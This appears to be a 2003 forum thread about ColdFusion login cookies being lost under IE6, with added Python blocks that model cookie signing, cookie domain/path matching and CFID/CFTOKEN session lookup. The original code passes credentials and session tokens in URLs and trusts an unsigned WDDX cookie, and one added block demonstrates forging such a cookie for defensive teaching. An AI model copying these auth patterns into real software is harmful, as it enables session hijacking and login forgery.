dbabbitt
asked on
How do I stop losing my cookies and stay logged in?
Hi Guys!
I am running CF Server 5. After the rash of MS updates a few weeks ago, sometimes when I click on a form link, I lose my User_Info cookie that tells me if I'm logged in or not. This causes the Application.cfm to cf include the login page and abort.
To start off with, I have logged in and have my User_Info cookie. Next, I click on a link like this:
<form
action="http://www.myproductionserver.net/the/path/to_my_script_is.cfm?CFID=39639&CFTOKEN=74431736&Tab=7&Type=Supervisor&E5180B05-1ED5-4B72-BFBE5AF173D2E69F"
method="post"
name="tab7Form"
style="margin-bottom: 0px; margin-top: 0px;"
><a
href="javascript:this.document.forms['tab7Form'].submit()"
class="nameLinkSmall"
onmouseout="window.status=' ';return(true);"
onmouseover="window.status ='http://www.myproductionserver.net/the/path/to_my_script_is.cfm?CFID=39639&CFTOKEN=74431736&Tab=7&Type=Supervisor&E5180B05-1ED5-4B72-BFBE5AF173D2E69F';return(true);"
>Supervisor</a></form>
and am forced to log in!!
Application.cfm looks like this:
<!--- Deserialize the contents of the cookie --->
<cftry>
<cfif IsDefined('Cookie.User_Info')>
<cfwddx
action="WDDX2CFML"
input="#Cookie.User_Info#"
output="Access"
>
<cfelse>
<cfif IsDefined('Client.User_Info')><cfwddx
action="WDDX2CFML"
input="#Client.User_Info#"
output="Access"
></cfif>
</cfif>
<cfcatch><cfabort></cfcatch>
</cftry>
<!--- Create an arbitrary (but consistently used) scope for log ins --->
<cfapplication
name="MyProductionServerzApplicationName"
clientmanagement="Yes"
sessionmanagement="Yes"
sessiontimeout="#MySessionTimeOut#"
>
<cfif NOT (IsDefined('Access') OR ListFindNoCase(MyTrustedTemplateList, CGI.SCRIPT_NAME) OR IsAuthenticated('MyProductionServerzApplicationName'))>
<!--- The user is NOT authenticated --->
<cfscript>
ShowLogin = "False";
</cfscript>
<cftry>
<cfscript>
if((NOT IsDefined('Form.User_Logon')) OR (NOT Len(Trim(Form.User_Logon)))) {
if(IsDefined('URL.User_Logon') AND Len(Trim(URL.User_Logon))) {
/* This sometimes blows up if the value to be decrypted is not valid */
Form.User_Logon = Decrypt(URL.User_Logon, 'MyUserLogonDecryptionKey');
}
}
if((NOT IsDefined('Form.User_Password')) OR (NOT Len(Trim(Form.User_Password)))) {
if(IsDefined('URL.User_Password') AND Len(Trim(URL.User_Password))) {
/* This sometimes blows up if the value to be decrypted is not valid */
Form.User_Password = Decrypt(URL.User_Password, 'MyUserPasswordDecryptionKey');
}
}
</cfscript>
<cfcatch></cfcatch>
</cftry>
<cfif IsDefined('Form.User_Logon') and IsDefined('Form.User_Password')>
<!--- The login form was submitted --->
<cftry>
<cfauthenticate
securitycontext="MyProductionServerzApplicationName"
username="#Form.User_Logon#"
password="#Form.User_Password#"
setcookie="YES"
>
<cfif NOT (IsDefined('Access') OR ListFindNoCase(TrustList, CGI.SCRIPT_NAME))>
<cfinclude template="/includes/check_userz_password.cfm">
<cfif PleaseTryAgain>
<cfoutput><table
height="100%"
width="100%"
><tr><td
align="center"
>The login name and password you supplied were incorrect.</td></tr></table></cfoutput>
<cfabort>
<cfelse>
<cfinclude template="/path/log_user_into_central_station.cfm">
</cfif>
</cfif>
<cfcatch type="security">
<!--- Security error in login occurred, show login again --->
<h3>Invalid Login</h3>
<cfset ShowLogin="Yes">
</cfcatch>
</cftry>
<cfelse>
<!--- The login was NOT detected --->
<cfset ShowLogin="Yes">
</cfif>
<cfif ShowLogin>
<cfset EmailTitle="Forced Login From the Application Template">
<cfinclude template="/includes/send_email_to_the_developer.cfm">
<cfinclude template="/index.cfm">
<cfabort>
</cfif>
</cfif>
The email the developer gets when this forced login happens is in HTML form. It's just a series of cf dumps:
Forced Login From the Application Template
----------------------------------------------------------------------------
TheLast5StaffWhoHaveLoggedInAtThisAddress
AGENCY_NAME LOGIN_TIME NAME_FIRST NAME_LAST PROGRAM_NAME USERS_ID
My Agency, Inc. 2003-03-20 08:48:26 Dave Babbitt My Program 443
My Agency, Inc. 2003-03-20 08:47:27 Dave Babbitt My Program 443
My Agency, Inc. 2003-03-20 08:46:26 Dave Babbitt My Program 443
My Agency, Inc. 2003-03-20 08:45:27 Dave Babbitt My Program 443
My Agency, Inc. 2003-03-20 08:44:42 Dave Babbitt My Program 443
Application
APPLICATIONNAME MYPRODUCTIONSERVERZAPPLICATIONNAME
DATEMASK m/d/yyyy
DEFAULTFONT Trebuchet MS
TIMEMASK h:mm tt
CGI
AUTH_PASSWORD
AUTH_TYPE
AUTH_USER
CERT_COOKIE
CERT_FLAGS
CERT_ISSUER
CERT_KEYSIZE
CERT_SECRETKEYSIZE
CERT_SERIALNUMBER
CERT_SERVER_ISSUER
CERT_SERVER_SUBJECT
CERT_SUBJECT
CF_TEMPLATE_PATH X:\INETPUB\WWWROOT\whatever\the\path\to_my_script_is.cfm
CONTENT_LENGTH 0
CONTENT_TYPE application/x-www-form-urlencoded
GATEWAY_INTERFACE CGI/1.1
HTTP_ACCEPT image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*
HTTPS off
HTTPS_KEYSIZE
HTTPS_SECRETKEYSIZE
HTTPS_SERVER_ISSUER
HTTPS_SERVER_SUBJECT
PATH_INFO /the/path/to_my_script_is.cfm
PATH_TRANSLATED X:\INETPUB\WWWROOT\whatever\the\path\to_my_script_is.cfm
QUERY_STRING CFID=39639&CFTOKEN=74431736&Tab=8&Type=Mail&6870E1EB-219B-41BD-88A28FC5A7AFAC25
[Edited by Cerebro]
REMOTE_ADDR 127.0.0.1
REMOTE_HOST 127.0.0.1
[Edited by Cerebro]
REMOTE_USER
REQUEST_METHOD POST
SCRIPT_NAME /the/path/to_my_script_is.cfm
SERVER_NAME www.myproductionserver.net
SERVER_PORT 80
SERVER_PORT_SECURE 0
SERVER_PROTOCOL HTTP/1.1
SERVER_SOFTWARE Microsoft-IIS/5.0
WEB_SERVER_API ISAPI
Cookie
CFID 39639
CFTOKEN 74431736
Form
Request
CFADUMPINITED FALSE
Session
CFID 39639
CFTOKEN 74431736
SESSIONID MYPRODUCTIONSERVERZAPPLICATIONNAME_39639_74431736
URLTOKEN CFID=39639&CFTOKEN=74431736
URL
CFID 39639
CFTOKEN 74431736
OVERRIDE_DEBUG_MODE DEBUG
TAB 8
TYPE Mail
Client Variables
CFID 39639
CFToken 74431736
URLToken CFID=39639&CFTOKEN=74431736
HitCount 4
TimeCreated {ts '2003-03-20 08:50:51'}
LastVisit {ts '2003-03-20 08:51:05'}
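Added example, not code from the thread: the Application.cfm above treats any Cookie.User_Info that <cfwddx> can deserialize as proof of login, so whoever can write that cookie can mint an Access structure without ever authenticating. The Python below models that check next to a version where the packet is signed with a server-held key and the MAC is verified before anything is deserialized. JSON stands in for the WDDX packet, the key, the field names and the cookie layout are assumptions for the example, and nothing here reproduces ColdFusion's own API.

```python
import base64
import hashlib
import hmac
import json
import secrets
from typing import Optional

# Server-side key; assumed to live in server configuration, never in a cookie or a URL.
SERVER_KEY = secrets.token_bytes(32)


def make_packet(access: dict) -> str:
    """Serialize the Access structure. JSON stands in for the WDDX packet on the page."""
    return json.dumps(access, sort_keys=True, separators=(",", ":"))


def unsigned_login_check(cookie_value: str) -> Optional[dict]:
    """Model of the page's check: any packet that deserializes counts as logged in."""
    try:
        access = json.loads(cookie_value)
    except ValueError:
        return None
    return access if isinstance(access, dict) else None


def _b64(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).decode().rstrip("=")


def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_packet(packet: str, key: bytes = SERVER_KEY) -> str:
    """Cookie value = base64url(packet) '.' hex(HMAC-SHA256(key, base64url(packet)))."""
    body = _b64(packet.encode())
    mac = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}.{mac}"


def signed_login_check(cookie_value: str, key: bytes = SERVER_KEY) -> Optional[dict]:
    """Verify the MAC in constant time; only then deserialize the packet."""
    body, sep, mac = cookie_value.partition(".")
    if not sep:
        return None
    expected = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(mac, expected):
        return None
    try:
        access = json.loads(_unb64(body))
    except ValueError:  # bad base64 or bad JSON (binascii.Error is a ValueError)
        return None
    return access if isinstance(access, dict) else None


def tamper(cookie_value: str, new_access: dict) -> str:
    """What an attacker can do without the key: keep the old MAC, swap the body."""
    _, _, mac = cookie_value.partition(".")
    return f"{_b64(make_packet(new_access).encode())}.{mac}"


if __name__ == "__main__":
    # Constructed sample: a legitimate Access structure and a forged one.
    legit = {"USERS_ID": 443, "NAME_LAST": "Babbitt", "PROGRAM_NAME": "My Program"}
    forged = {"USERS_ID": 1, "NAME_LAST": "Admin"}
    print("unsigned accepts forgery:", unsigned_login_check(make_packet(forged)) == forged)
    cookie = sign_packet(make_packet(legit))
    print("signed accepts legit:", signed_login_check(cookie) == legit)
    print("signed rejects tamper:", signed_login_check(tamper(cookie, forged)) is None)
```

The split between the two checks is the whole point: the unsigned version answers "is this a packet?", the signed version answers "did this server issue this packet?". A cookie that is also persisted for a day (expires="1" on the page) should at least carry the Secure and HttpOnly attributes once the site moves off plain HTTP.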
ASKER
If I hit Ctrl-F5 when I am sent to the forced relogin page, it always corrects itself and gives me the intended page.
Did you try "Registry" for your client storage
<cfapplication name="app_name"
clientmanagement="Yes"
sessionmanagement="Yes"
setclientcookies="Yes"
sessiontimeout="#CreateTimeSpan(0,0,30,0)#"
applicationtimeout="#CreateTimeSpan(2,0,0,0)#"
clientstorage="REGISTRY">
ASKER
It used to be on registry, but I'm tired of this problem, so I verified my ODBC connection to my Cold_Fusion_Client_Variables database and am now using that. It has no effect.
ASKER
It's weird, if I pass just the user logon in a hidden variable, submitting the form no longer causes a forced re-login. It means there is probably a flaw in my form field inspection logic in Application.cfm
ASKER
I don't think it's a flaw in my form field inspection logic in Application.cfm. Try these instructions to prove it:
1) Log into
[Edited by Cerebro]
http://localhost/RentACoder/test_form_field_inpection_logic.cfm
[Edited by Cerebro]
using RentACoder as the User ID and RentACoder as the Password.
2) Click the submit button without checking any boxes.
3) If it forces you to re-login, that's the problem I'm trying to solve. Just hit Ctrl-F5 to continue.
ASKER
For a different take on the problem, check out http://localhost/RentACoder/test_cgi_http_host.cfm with the same instructions as above.
ASKER
The environmental variables that show up different when I get a forced login:
1) CGI.HTTP_ACCEPT (didn't disappear but now it's image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*)
2) CGI.HTTP_ACCEPT_ENCODING (disappeared)
3) CGI.HTTP_ACCEPT_LANGUAGE (disappeared)
4) CGI.HTTP_CACHE_CONTROL (disappeared)
5) CGI.HTTP_CONNECTION (disappeared)
6) CGI.HTTP_CONTENT_LENGTH (disappeared)
7) CGI.HTTP_CONTENT_TYPE (disappeared)
8) CGI.HTTP_COOKIE (disappeared)
9) CGI.HTTP_HOST (disappeared)
10) CGI.HTTP_REFERER (disappeared)
11) CGI.HTTP_USER_AGENT (disappeared)
The environmental variables that re-appear when I hit Ctrl-F5:
1) CGI.HTTP_ACCEPT (now it's back to */*)
2) CGI.HTTP_ACCEPT_ENCODING
3) CGI.HTTP_ACCEPT_LANGUAGE
4) CGI.HTTP_CACHE_CONTROL
5) CGI.HTTP_CONNECTION
6) CGI.HTTP_CONTENT_LENGTH
7) CGI.HTTP_CONTENT_TYPE
8) CGI.HTTP_COOKIE
9) CGI.HTTP_HOST
10) CGI.HTTP_REFERER
11) CGI.HTTP_USER_AGENT
Does having the CGI.HTTP_ACCEPT change give anybody any clue as to what's going on? As you can see, losing CGI.HTTP_COOKIE is critical because that means losing my cookies.
I found that if I COMPLETELY changed over from HTTP_HOST to SERVER_NAME the problem DOESN'T go away. Check out https://www.experts-exchange.com/questions/20486370/Why-is-my-CGI-HTTP-HOST-an-empty-string-now.html for further details.
when you use CGI.Server_Name does the value display differently or blank?
You shouldn't lose your cookie. Is the cookie set for your domain or a URL? Turn on cookie prompting and see how the cookies are set. Output the cookies on each page to make sure that cookies are sent back by the browser (it may be a domain/path issue).
CJ
add this to your cfapplication:
SetDomainCookies="yes"
CJ
ASKER
Adding SetDomainCookies="yes" to my cfapplication has no effect, CGI.HTTP_ACCEPT_ENCODING, CGI.HTTP_ACCEPT_LANGUAGE, CGI.HTTP_CACHE_CONTROL, CGI.HTTP_CONNECTION, CGI.HTTP_CONTENT_LENGTH, CGI.HTTP_CONTENT_TYPE, CGI.HTTP_COOKIE, CGI.HTTP_HOST, CGI.HTTP_REFERER, and CGI.HTTP_USER_AGENT are still missing and I still get forced to log back on.
In other words, I'm not just losing my cookie. I'm losing the ability of my browser to send cookies, among other things.
HTTP_* are browser provided values.. they are not guaranteed to exist.
when you turn on cookie prompting you see the cookie get set, right? What is the domain of the cookie and its path?
if the browser is not sending cookies back to the server it may be more of an environment issue with the browser rather than the server.
I have never had a problem using cookies in a cfapp.
SetDomainCookies should help b/c it will set the cfid, cftoken cookies at the domain level so a subdomain or path has no effect on them.
CJ
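Added example, not from the thread: CJ's questions about the cookie's domain and path can be answered without a browser. The function below applies the RFC 6265 domain, path and Secure rules to decide whether a cookie issued on one URL would be sent back on another, which is the "domain/path issue" suspected above. The host and script paths come from the thread; the cookie attributes are assumptions chosen to exercise each rule.

```python
from typing import Optional
from urllib.parse import urlsplit


def default_path(request_path: str) -> str:
    """RFC 6265 5.1.4: cookie without Path gets the directory of the issuing URL, else '/'."""
    if not request_path.startswith("/") or request_path.count("/") == 1:
        return "/"
    return request_path.rsplit("/", 1)[0]


def domain_matches(host: str, cookie_domain: Optional[str], issuing_host: str) -> bool:
    """No Domain attribute: host-only cookie, exact host match. With Domain: suffix match."""
    host = host.lower()
    if cookie_domain is None:
        return host == issuing_host.lower()
    domain = cookie_domain.lower().lstrip(".")
    return host == domain or host.endswith("." + domain)


def path_matches(request_path: str, cookie_path: str) -> bool:
    """RFC 6265 5.1.4 path-match."""
    if request_path == cookie_path:
        return True
    if request_path.startswith(cookie_path):
        return cookie_path.endswith("/") or request_path[len(cookie_path)] == "/"
    return False


def would_send(set_url: str, attrs: dict, request_url: str) -> bool:
    """Would a browser attach a cookie set on set_url (with Set-Cookie attrs) to request_url?

    attrs may carry 'domain', 'path' and 'secure' (assumed keys for this example).
    """
    issued = urlsplit(set_url)
    target = urlsplit(request_url)
    issuing_host = issued.hostname or ""
    domain = attrs.get("domain")
    # A browser rejects the cookie outright if Domain does not cover the issuing host.
    if domain is not None and not domain_matches(issuing_host, domain, issuing_host):
        return False
    if attrs.get("secure") and target.scheme != "https":
        return False
    cookie_path = attrs.get("path") or default_path(issued.path or "/")
    return (domain_matches(target.hostname or "", domain, issuing_host)
            and path_matches(target.path or "/", cookie_path))


if __name__ == "__main__":
    site = "http://www.myproductionserver.net"
    script = site + "/the/path/to_my_script_is.cfm"
    print("login at /, host-only:", would_send(site + "/login.cfm", {}, script))
    print("login at /admin/, no Path:", would_send(site + "/admin/login.cfm", {}, script))
    print("Secure cookie over http:", would_send(site + "/login.cfm", {"secure": True}, script))
```

The two cases that bite in practice are both visible here: a cookie issued from a login page in a subdirectory is scoped to that directory unless Path=/ is set, and a host-only cookie for www.myproductionserver.net is not sent to the bare domain. The dump on the page shows HTTPS off, so a Secure attribute would stop the cookie being sent at all until the site moves to https.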
ASKER
Sometimes the Client.User_Info is still set so just at the last minute I'm converting that into the Access structure. Weird.
a few things I noticed:
why do you have clientmanagement turned on.. do you use something specific to require that?
Either your session data is not being set or your authentication is not working right.
try outputting everything that you check for (verify that the user is logged in with) onto the screen before you do the login check. (once you login.. change the code and test it out) See if something is missing.
CJ
Oops I now see that you are using Client.User_Info. Any reason for using that instead of just Session.User_Info?
CJ
ASKER
How do I turn on cookie prompting? I overrode automatic cookie handling in the advanced privacy settings, but didn't get any notification when I logged into my site. It should have prompted me at /login.cfm that I was getting a cookie, right?
That should work. I use Mozilla for that kind of stuff b/c it lets me see the values of my cookies as I am progressing through the site.
CJ
ASKER
You need to understand that this is happening to about a dozen different people. Their user agents look like this:
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
I would think that this is more of a browser setting than code issue.
do use the option of:
SetDomainCookies=Yes
The other issue could be that maybe those users are blocking your site from setting cookies? What is the site URL and what is the domain that the cookies get set for?
Are you able to reproduce this or is it just specific to those users?
CJ
ASKER
This is happening to myself and a few dozen other users. It started happening without any changes to the code.
ASKER
I can make it happen anytime I want by pushing an arbitrary submit button.
hi,
what is the "EXPIRES" property of CFCOOKIE set to ???
if you haven't set anything there, then it's browser based and will get deleted once the browser window is closed
but if you have set the expires property to some time period, then you will have it on the client's machine till that period has elapsed.
also have a client-storage mechanism for storing the cookies - don't use registry if you have many users on your site - I had used it before and my registry was overloaded with 2 lacs of folders storing client info - which was a sheer waste of space and slowed down my server !
K'Rgds
Anand
ASKER
Why the fixation on the cookie? When I get a forced logon, there are no cookies to allow or block or check the Domain or Expires properties of because there is no CGI.HTTP_COOKIE to speak of. This is something bigger than the cookies, guys. I'm also losing my CGI.HTTP_ACCEPT_ENCODING, CGI.HTTP_ACCEPT_LANGUAGE, CGI.HTTP_CACHE_CONTROL, CGI.HTTP_CONNECTION, CGI.HTTP_CONTENT_LENGTH, CGI.HTTP_CONTENT_TYPE, CGI.HTTP_HOST, CGI.HTTP_REFERER, and CGI.HTTP_USER_AGENT.
Can you post the code where you set the cookies?
Also, when you converted the client storage mechanism from registry to SQL or Access, did you convert the data? Did you clean out the registry afterwards?
ASKER
When I converted the client storage mechanism from registry to SQL, I did not convert the data. Afterwards, cleaning out the registry, HKEY_LOCAL_MACHINE\SOFTWARE\Allaire\ColdFusion\CurrentVersion\Clients took almost a minute to expand in regedit. I deleted the whole key and restarted the main ColdFusion Services. I opened a new browser, logged into the site, clicked on a form link, and... no joy. It still gives me the re-login form. It also still misinterprets what kind of browser I am using (because of the missing CGI.HTTP_USER_AGENT). Holding down the Ctrl key and hitting F5 then clicking the Retry button works every time to get back what I had originally.
ASKER
At the bottom of the log user into central station template, it looks like this:
<!--- Serialize packet --->
<CFWDDX ACTION="CFML2WDDX" INPUT="#Access#" OUTPUT="myPacket">
<!--- Create cookie with contents of the packet, make sure it expires in a day. --->
<cfcookie name="User_Info" value="#myPacket#" expires="1">
ASKER
I'm now logging the user in like this:
<!--- Serialize packet --->
<CFWDDX ACTION="CFML2WDDX" INPUT="#Access#" OUTPUT="myPacket">
<!--- Create cookie with contents of the packet, make sure it expires in a day. --->
<cfcookie name="User_Info" value="#myPacket#" expires="1">
<cfscript>
/* Create client variable with contents of the packet */
Client.User_Info = myPacket;
/* Create session variable with contents of the packet */
StructInsert(Session, 'User_Info', myPacket, true);
</cfscript>
Before I push the submit button:
1) All the various CGI.HTTP_* variables mentioned above exist.
2) Cookie.CFID = 21, Cookie.CFMAGIC = 21:73159472, Cookie.CFTOKEN = 73159472, and Cookie.USER_INFO exists.
3) Session.CFID = 21, Session.CFTOKEN 73159472, and Session.USER_INFO exists.
4) Client.CFID = 21, Client.CFToken = 73159472, and Client.USER_INFO exists.
After I push the submit button:
1) All the various CGI.HTTP_* variables mentioned above (except for CGI.HTTP_ACCEPT) no longer exist.
2) Cookie.CFID = 24, Cookie.CFMAGIC = 24:85905525, Cookie.CFTOKEN = 85905525, and Cookie.USER_INFO no longer exists.
3) Session.CFID = 24, Session.CFTOKEN 85905525, and Session.USER_INFO no longer exists.
4) Client.CFID = 24, Client.CFToken = 85905525, and Client.USER_INFO no longer exists.
it seems as though your cfid and cftoken values are changing so you lose your session and client data (b/c the combination of the two identify the user)
when those change, the cf application thinks its a different/new user.
in:
<!--- Create an arbitrary (but consistently used) scope for log ins --->
<cfapplication
name="MyProductionServerzApplicationName"
clientmanagement="Yes"
sessionmanagement="Yes"
sessiontimeout="#MySessionTimeOut#"
>
What is the value of MySessionTimeOut?
Try this as an alternative CFAPPLICATION:
<cfapplication
name="MyProductionServerzApplicationName"
clientmanagement="Yes"
sessionmanagement="Yes"
sessiontimeout="#MySessionTimeOut#"
SETCLIENTCOOKIES="NO">
<!--- CF will not set the client cookies automatically, so
set them manually as per-session cookies --->
<CFLOCK SCOPE="SESSION" TYPE="READONLY" TIMEOUT="5">
<CFCOOKIE NAME="CFID" VALUE="#SESSION.CFID#">
<CFCOOKIE NAME="CFTOKEN" VALUE="#SESSION.CFTOKEN#">
</CFLOCK>
For Client Management:
<!--- With Client Management Enabled --->
<!--- CF will not set the client cookies automatically,
so set them manually as per-session cookies --->
<CFCOOKIE NAME="CFID" VALUE="#CLIENT.CFID#">
<CFCOOKIE NAME="CFTOKEN" VALUE="#CLIENT.CFTOKEN#">
Now, since you have client and session management enabled, you will have to make sure that cfid and cftoken for both client and session scope are the same. Try outputting them.
A good read:
http://www.macromedia.com/support/coldfusion/ts/documents/tn17915.htm
CJ
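Added example, not ColdFusion's code and not anything posted in the thread: a model of how a CFID/CFTOKEN pair is turned into a session, written to show why a changing CFID means a new, empty session, as CJ describes above and as the asker saw when CFID went from 21 to 24. The store checks the Cookie header, then CFID/CFTOKEN in the query string (the form action on the page carries both), and mints a fresh pair when neither matches. The lookup order, the starting CFID and the token format are assumptions for the model. It also makes the cost of URL tokens visible: a request with no Cookie header at all resumes the session if it carries the tokens from the URL, so anything that sees that URL (a Referer header, a proxy log) can do the same.

```python
import secrets
from http.cookies import SimpleCookie
from typing import Dict, Iterator, Tuple
from urllib.parse import parse_qs

SessionKey = Tuple[str, str]  # (CFID, CFTOKEN)


class SessionStore:
    """Toy session store: session data is keyed by the CFID/CFTOKEN pair."""

    def __init__(self, first_cfid: int = 21) -> None:
        self._sessions: Dict[SessionKey, dict] = {}
        self._next_cfid = first_cfid  # 21 mirrors the asker's dump; the value is arbitrary

    def create(self) -> SessionKey:
        """Mint a new pair: sequential CFID, random 8-digit CFTOKEN (assumed format)."""
        key = (str(self._next_cfid), str(secrets.randbelow(10**8)).zfill(8))
        self._next_cfid += 1
        self._sessions[key] = {}
        return key

    def data(self, key: SessionKey) -> dict:
        return self._sessions[key]

    def resolve(self, cookie_header: str, query_string: str) -> Tuple[str, SessionKey]:
        """Return (source, key); source is 'cookie', 'url', or 'new' when a session was minted."""
        for source, key in self._candidates(cookie_header, query_string):
            if key in self._sessions:
                return source, key
        # Neither candidate matched: the request is treated as a brand-new visitor,
        # which is exactly what a login check keyed on Session.* then fails on.
        return "new", self.create()

    @staticmethod
    def _candidates(cookie_header: str, query_string: str) -> Iterator[Tuple[str, SessionKey]]:
        jar = SimpleCookie()
        jar.load(cookie_header or "")
        cookies = {name.upper(): morsel.value for name, morsel in jar.items()}
        yield "cookie", (cookies.get("CFID"), cookies.get("CFTOKEN"))
        query = {k.upper(): v[0] for k, v in parse_qs(query_string or "").items()}
        yield "url", (query.get("CFID"), query.get("CFTOKEN"))


if __name__ == "__main__":
    store = SessionStore()
    cfid, cftoken = store.create()
    store.data((cfid, cftoken))["USER_INFO"] = "<wddxPacket>...</wddxPacket>"  # constructed
    print(store.resolve(f"CFID={cfid}; CFTOKEN={cftoken}", "Tab=7"))            # cookie
    print(store.resolve("", f"CFID={cfid}&CFTOKEN={cftoken}&Tab=7&Type=Supervisor"))  # url
    print(store.resolve("", "Tab=7&Type=Supervisor"))                              # new, CFID 22
```

The third call is the failure mode in the thread: a POST that arrives with no Cookie header and no tokens in the URL gets a fresh CFID, and every scope that hung off the old pair (Session.USER_INFO, Client.USER_INFO) is gone. The second call is the reason to stop putting CFID/CFTOKEN in form actions once cookies work: the pair alone is enough to resume the session.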
another good read:
http://www.thenetprofits.co.uk/coldfusion/faq/topic.cfm?TopicID=1#answer63
ASKER
The value of MySessionTimeOut is:
<!--- Use a variable for session time out so it can be used as the query cached period --->
<cfset MySessionTimeOut="#CreateTimeSpan(0, 1, 0, 0)#">
try some of the above.. let us know the results.
CJ
ASKER
In Application.cfm I changed this:
<!--- Create an arbitrary (but consistently used) scope for log ins --->
<cfapplication
name="MyProductionServerzApplicationName"
clientmanagement="Yes"
sessionmanagement="Yes"
sessiontimeout="#MySessionTimeOut#"
setdomaincookies="Yes"
>
<!--- Re-write the session cookies so they will only be memory cookies. --->
<cfcookie name="CFID" value="#Cookie.CFID#">
<cfcookie name="CFTOKEN" value="#Cookie.CFTOKEN#">
to this:
<!--- Create an arbitrary (but consistently used) scope for log ins --->
<cfapplication
name="MyProductionServerzApplicationName"
clientmanagement="Yes"
sessionmanagement="Yes"
sessiontimeout="#MySessionTimeOut#"
setclientcookies="No"
>
<!--- CF will not set the client cookies automatically, so set them manually as per-session cookies --->
<cflock timeout="5" throwontimeout="No" type="READONLY" scope="SESSION">
<cfcookie name="CFID" value="#Session.CFID#">
<cfcookie name="CFTOKEN" value="#Session.CFTOKEN#">
</cflock>
ASKER
The CFID is still changing after I made the above changes to Application.cfm. Before hitting the submit button:
CFID 25
CFToken 33044530
After hitting the submit button:
CFID 26
CFToken 39078247
This is very odd.
Can you outline your path/process and entail what happens vs what is supposed to happen.
Thanx,
CJ
ASKER
But why would any cfcookie action work if I'm losing CGI.HTTP_COOKIE on the way back? I think version 6.0.2800.1106 of Internet Explorer is the problem. I don't lose my CFID cookies when I use Mozilla 1.3 (Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.3) Gecko/20030312), and, excepting the workarounds for the lack of response to cflocation, I don't lose Session.User_Info and Client_Info either. Strangely, I was never able to set Cookie.User_Info.
HTTP_COOKIE
Name-value pair stored earlier at the client by the server
Means if the Server hasn't set any cookies yet it will be blank.
I think it maybe an issue with the domain/path.
try this:
<!--- Create an arbitrary (but consistently used) scope for log ins --->
<cfapplication
name="MyProductionServerzApplicationName"
clientmanagement="Yes"
sessionmanagement="Yes"
sessiontimeout="#MySessionTimeOut#"
setclientcookies="No"
>
<!--- CF will not set the client cookies automatically, so set them manually as per-session cookies --->
<cflock timeout="5" throwontimeout="No" type="READONLY" scope="SESSION">
<cfcookie name="CFID" value="#Session.CFID#" domain="yourproductionserver.net" path="/">
<cfcookie name="CFTOKEN" value="#Session.CFTOKEN#" domain="yourproductionserver.net" path="/">
</cflock>
CJ
ASKER
1) I go to the home page.
a) IIS passes the default document and the browser's CGI variables to the CF Server.
b) The CF Server runs Application.cfm first and does little because the default document is on the approved list.
c) The default document and its login form (cfincluded) are run.
2) I fill in my user id and password and click the submit button.
a) IIS passes the login template and the browser's CGI variables to the CF Server.
b) The CF Server runs Application.cfm first and does little because the login template is on the approved list.
c) The login template is run.
i) The user info cookie is set.
ii) The browser is cflocated to the central station template.
d) IIS passes the central station template and the browser's CGI variables to the CF Server.
e) The CF Server runs Application.cfm first and does little because the user info cookie is set.
f) The central station template is run and a clock in form is built for me to click on.
3) I click the submit button in the clock in form.
a) IIS passes the clockin template and SHOULD HAVE PASSED the browser's CGI variables to the CF Server, but doesn't for some reason.
b) The CF Server runs Application.cfm first and discovers that the browser's CGI variables are missing.
i) The login form is cfincluded.
ii) The Application.cfm template is aborted.
ASKER
This is what the IIS log looks like when I perform the above steps:
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2003-03-21 19:44:21
#Fields: time cs-method cs-uri-stem cs-uri-query cs(Cookie) cs(Referer)
19:44:21 GET /index.cfm - CFMAGIC=25%3A33044530;+USER_INFO=...this-is-a-really-big-cookie-dudes...;+CFID=39;+CFTOKEN=99788566 -
19:44:28 POST /logon.cfm - CFMAGIC=25%3A33044530;+USER_INFO=...this-is-a-really-big-cookie-dudes...;+CFID=39;+CFTOKEN=99788566 http://davezcompaq/
19:44:28 GET /central_station.cfm C2CD1387-F54E-4C17-BDC4186F20C6C5AB CFMAGIC=25%3A33044530;+USER_INFO=...this-is-a-really-big-cookie-dudes...;+CFID=39;+CFTOKEN=99788566 -
19:44:49 POST /_PM/time/time_clock_out_confirm.cfm - CFMAGIC=25%3A33044530;+USER_INFO=...this-is-a-really-big-cookie-dudes...;+CFID=39;+CFTOKEN=99788566 http://davezcompaq/central_station.cfm?C2CD1387-F54E-4C17-BDC4186F20C6C5AB
This suggests to me that since IIS is logging the user info cookie it is probably passing that cookie onto the CF server. I don't understand why the cf magic cookie does not mesh with the cf id and cf token cookies, though.
cfid and cftoken didn't seem to change.
cfmagic is a tricky thing.. here is some explanation about it:
http://docs.jcu.edu.au/cold_fusion/cfdocs/Allaire_Support/new.htm#setdomaincookies
CJ
ASKER
Since I started posting comments, someone at www.asobens.com.mx is trying to run my cmd.exe via my production server. I guess I'm leaving too much info in these comments. Erk. :-(
>someone at www.asobens.com.mx is trying to run my cmd.exe
someone is trying to hack your server from what you have posted here? Wow, that sux. I will get an Admin involved to see if they can find out what/who is trying.
I would take some security measures, like disabling cfexecute and any remote-invocation CF code.
make sure you are not evaluating or executing anything passed via url params.
CJ
ASKER
In Application.cfm I changed this:
<!--- CF will not set the client cookies automatically, so set them manually as per-session cookies --->
<cflock timeout="5" throwontimeout="No" type="READONLY" scope="SESSION">
<cfcookie name="CFID" value="#Session.CFID#">
<cfcookie name="CFTOKEN" value="#Session.CFTOKEN#">
</cflock>
to this:
<!--- CF will not set the client cookies automatically, so set them manually as per-session cookies --->
<cflock timeout="5" throwontimeout="No" type="READONLY" scope="SESSION">
<cfcookie name="CFID" value="#Session.CFID#" domain=".#CGI.SERVER_NAME#" path="/">
<cfcookie name="CFTOKEN" value="#Session.CFTOKEN#" domain=".#CGI.SERVER_NAME#" path="/">
</cflock>
and in some cases I was not forced to re-logon! I will peruse the literature made available to me and get back to you. :-)
Thanx
